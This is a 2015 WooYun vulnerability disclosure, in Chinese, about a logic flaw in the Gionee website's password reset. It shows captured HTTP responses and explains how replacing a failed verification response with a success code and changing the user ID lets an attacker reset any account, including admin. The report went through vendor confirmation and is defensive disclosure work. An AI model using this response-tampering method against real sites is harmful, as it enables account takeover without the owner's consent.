当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0119753

漏洞标题:金立手机官网可重置任意用户密码(admin账号测试)

相关厂商:gionee.com

漏洞作者: 路人甲

提交时间:2015-06-11 13:57

修复时间:2015-07-27 10:14

公开时间:2015-07-27 10:14

漏洞类型:网络设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-11: 细节已通知厂商并且等待厂商处理中
2015-06-12: 厂商已经确认,细节仅向厂商公开
2015-06-22: 细节向核心白帽子及相关领域专家公开
2015-07-02: 细节向普通白帽子公开
2015-07-12: 细节向实习白帽子公开
2015-07-27: 细节向公众公开

简要描述:

找不到工作,你们要我么,即将失业的游民!!!
可怜我给高点rank吧,呜呜~~~~~~~~~

详细说明:

0x1:自己的用户走一遍正确的流程,记录下有用的响应包。

q.png


下一步到获取验证码的页面(绑定手机的用户),接着获取验证码输入正确的验证码下一步截取响应包。

w.png


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 11 Jun 2015 03:06:53 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Content-Language: zh-CN
Content-Length: 4100
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>找回密码-验证身份</title>
<link href="../static/css/reset.css" rel="stylesheet" type="text/css" />
<link href="../static/css/common_index.css" rel="stylesheet" type="text/css" />
<link rel="shortcut icon" href="../favicon.ico" />
<link rel="Bookmark" href="../favicon.ico" />
</head>
<body>
<div id="ma_reg_container">
<div id="ma_reg_header">
<div class="ma_in_header cl">
<a href="http://www.gionee.com/" class="ma_logo z"><img src="../static/images/common/login_logo.png" /></a>
</div>
</div>
<div id="ma_content" class="cl">
<div class="stephd cl">
<h1 class="t1 z">找回密码</h1>
<ul class="step_nav y" id="stepTwo">
<li>填写账户</li>
<li class="on">验证身份</li>
<li>设置新密码</li>
<li class="tow">完成</li>
</ul>
</div>
<div class="w960bx">
<div class="ma_in_reg_content_right">
<ul>
<li class="w3_log_tit mbt10">请选择验证方式:</li>
<li class="ma_login_input_1">
<select class="find_psw_selct" name="methods" id="Jmethod">
<option value="130*****882" type="2">手机</option>
</select>
<input type="hidden" id="Jcss" value="orange" />
<input type="hidden" id="Jservice" value="http://shop.gionee.com/login_success.shtml" />
<li class="w3_log_tit mbt10" id="Jhint">您的手机号码是:130*****882</li>

</ul>
<div class="ma_reg_btn_box">
<button class="ma_reg_btn z" type="button" style="display: none" id="JsetMail">
发送验证邮件
</button>
<button class="ma_reg_btn z" type="button" id="JsetMobile">
发送验证短信
</button>
</div>
</div>
</div>
</div>
</div>
<style>
.ft_white { width: 100%; padding: 10px 0; text-align: center; border-top: #dddddd 1px solid; color: #676767;font-family:"Microsoft Yahei",arial,simsun; line-height: 35px}
.ft_white a{color: #676767}
span.pipe{}
</style>
<div class="ft_white">
<div class="ft_cont">
服务热线:400-779-6666 <span class="pipe">|</span> <a href="/help_detail/63" target="_blank">隐私保护</a> <span class="pipe">|</span> <a href="http://www.gionee.com/op-webmap.shtml" target="_blank">网站地图</a><br/>
Copyright &copy; 2013 深圳市金立通信设备有限公司 版权所有 粤ICP备05087105号
</div>
</div>
<script type="text/javascript" src="../static/js/jquery-1.7.1.min.js"></script>
<script type="text/javascript" src="../static/js/core.js"></script>
<script>
(function(){
var domMethod=$id("Jmethod"),domSetMail=$id("JsetMail"),domSetMobile=$id("JsetMobile"),domHint=$id("Jhint");
var css=$id("Jcss").value,service=$id("Jservice").value;

$addEvent (domMethod,"change",function(e){
var value=this.value,type;
for(var i=0,childs=this.childNodes,len=childs.length;i<len;i++){
if(childs[i].value==value){
type=childs[i].getAttribute("type");
}
}
if(type==1){
domSetMail.style.display="block";
domSetMobile.style.display="none";
domHint.innerHTML="您的邮箱是:"+value;
}else{
domSetMail.style.display="none";
domSetMobile.style.display="block";
domHint.innerHTML="您的手机号码是:"+value;
}
});

if(domSetMail){
$addEvent (domSetMail,"click",function(){
$ajaxSendPwdMail({css:css,service:service},function(data){
if(data && data.code==0){
$setCookie("pwdMailTime",(new Date()).getTime());
window.location.href=data.nextlink;
}else{
alert("网络出错");
}
});
});
}
if(domSetMobile){
$addEvent (domSetMobile,"click",function(){
$ajaxSendPwdSms({css:css,service:service},function(data){
if(data && data.code==0){
$setCookie("pwdMobileTime",(new Date()).getTime());
window.location.href=data.nextlink;
}else{
alert("网络出错");
}
});
});
}

})();
</script>
</body>
</html>


e.png


0x2:放行之后到重置密码的页面。

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 11 Jun 2015 03:11:10 GMT
Content-Type: text/html;charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Content-Language: zh-CN
Content-Length: 4765
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>找回密码-设置新密码</title>
<link href="../static/css/reset.css" rel="stylesheet" type="text/css" />
<link href="../static/css/common_index.css" rel="stylesheet" type="text/css" />
<link rel="shortcut icon" href="../favicon.ico" />
<link rel="Bookmark" href="../favicon.ico" />
</head>
<body>
<div id="ma_reg_container">
<div id="ma_reg_header">
<div class="ma_in_header cl">
<a href="http://www.gionee.com/" class="ma_logo z"><img
src="../static/images/common/login_logo.png" />
</a>
</div>
</div>
<div id="ma_content" class="cl">
<div class="stephd cl">
<h1 class="t1 z">找回密码</h1>
<ul class="step_nav y" id="stepThree">
<li>填写账户</li>
<li>验证身份</li>
<li class="on">设置新密码</li>
<li class="tow">完成</li>
</ul>
</div>
<div class="w960bx">
<div class="ma_in_reg_content_right">
<form action="/cas/n/phoneRestPwd" method="post" onsubmit="return checkForm();">
<ul>
<li class="w3_log_tit mabo20">登录帐号:13080180882</li>
<li class="w3_log_tit mbt10">新登录密码:</li>
<li class="ma_login_input_1"><input name="pwd" id="Jpwd" type="password" maxlength="30" autocomplete="false" htmlEscape="true" /><div class="worm_tips_gray" id="JpwdHint"></div></li>
<li class="w3_log_tit mbt10">确认密码:</li>
<li class="ma_login_input_1"><input name="pwd1" id="Jpwd1" type="password" maxlength="30" autocomplete="false" htmlEscape="true" /><div class="worm_tips_gray" id="Jpwd1Hint"></div></li>
</ul>
<div class="ma_reg_btn_box">
<button class="ma_reg_btn z" id="Jbtn" type="submit">确定</button>
</div>
</form>
</div>
</div>
</div>
</div>
<style>
.ft_white { width: 100%; padding: 10px 0; text-align: center; border-top: #dddddd 1px solid; color: #676767;font-family:"Microsoft Yahei",arial,simsun; line-height: 35px}
.ft_white a{color: #676767}
span.pipe{}
</style>
<div class="ft_white">
<div class="ft_cont">
服务热线:400-779-6666 <span class="pipe">|</span> <a href="/help_detail/63" target="_blank">隐私保护</a> <span class="pipe">|</span> <a href="http://www.gionee.com/op-webmap.shtml" target="_blank">网站地图</a><br/>
Copyright &copy; 2013 深圳市金立通信设备有限公司 版权所有 粤ICP备05087105号
</div>
</div>
<script type="text/javascript" src="../static/js/jquery-1.7.1.min.js"></script>
<script type="text/javascript" src="../static/js/md5.js"></script>
<script type="text/javascript" src="../static/js/core.js"></script>
<script>
//(function(){
//校验密码
var domTxt=$id("Jpwd"),domTxt1=$id("Jpwd1");
var reg=/^.{6,30}$/;
var hintMap={
"Jpwd":{
def:"",
focus:"",
empty:"请输入密码",
err:"密码为6-30位",
suc:""
},
"Jpwd1":{
def:"",
focus:"",
empty:"请确认新密码",
err:"密码不一致",
suc:""
}
};
var hintCssMap={
def:"worm_tips_gray",
err:"ma_reg_error"
};
$focusInput(domTxt,"",function(isfocus,isNull){
var domid=domTxt.id;
if(isfocus){
setHint($id(domid+"Hint"),hintCssMap.def,hintMap[domid].def);
}else{
checkpwd(domid,0,isNull);
}
});
$focusInput(domTxt1,"",function(isfocus,isNull){
var domid=domTxt1.id;
if(isfocus){
setHint($id(domid+"Hint"),hintCssMap.def,hintMap[domid].def);
}else{
checkpwd(domid,0,isNull);
}
});
function checkpwd(domid,isMust,isNull){
var result=true,value=$.trim($id(domid).value);
isNull=isNull?true:value.length==0;
if(isNull){
if(isMust){
setHint($id(domid+"Hint"),hintCssMap.err,hintMap[domid].empty);
}else{
setHint($id(domid+"Hint"),hintCssMap.def,hintMap[domid].def);
}
result=false;
}else{
if(domid=="Jpwd"){
if(value.match(reg)==null){
result=false;
setHint($id(domid+"Hint"),hintCssMap.err,hintMap[domid].err);
}
}else{
if(value!==$id("Jpwd").value){
result=false;
setHint($id(domid+"Hint"),hintCssMap.err,hintMap[domid].err);
}
}
}
return result;
}
function checkForm(){
var result=true;
if(!checkpwd("Jpwd",1)){
result=false;
}
if(!checkpwd("Jpwd1",1)){
result=false;
}
if(result){
domTxt.value=hex_md5(domTxt.value);
domTxt1.value=hex_md5(domTxt1.value);
}
return result;
}
function setHint(elem,css,msg){
elem.innerHTML=msg;
elem.className=css;
elem.style.display="block";
}
//})();
</script>
</body>
</html>


r.png


u.png


看到修改密码的URL,就能很轻松的绕过验证码,只要用户绑定了手机号,在输入用户名之后能够在响应包里提取的绑定的手机号,之后构造修改用户密码的URL,即可成功重置密码,只是一种方法,下面说一种没有绑定手机号绑定邮箱或者木有绑定任何东西的用户,admin测试!

漏洞证明:

0x3:admin测试,验证码下一步阶段响应包修改为0x1里的code,放行看效果。

q.png


可以在响应包里提取到用户的uid和修改密码的类型,通过修改uid重置密码,用一个自己的用户绑定邮箱,之后修改uid也该修改,或者在这一步直接修改修改密码的方式,通过手机修改密码。

e.png


0x4:获取验证码会失败

r.png


{"code":"0","msg":"验证成功","nextlink":"/cas/n/phoneRestPwd?phoneNum=130xxxxxxx82&css=default&service="}


把code替换到验证错误的响应包,看下图。

t.png


就能到修改密码的页面,修改密码为wooyun123。
0x5:登录验证。

(I1Q6{Z1JZKKN63FBK}R537.png


修复方案:

完善服务端的验证机制,不单单是前端。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-06-12 10:13

厂商回复:

感谢对金立安全作出的贡献

最新状态:

暂无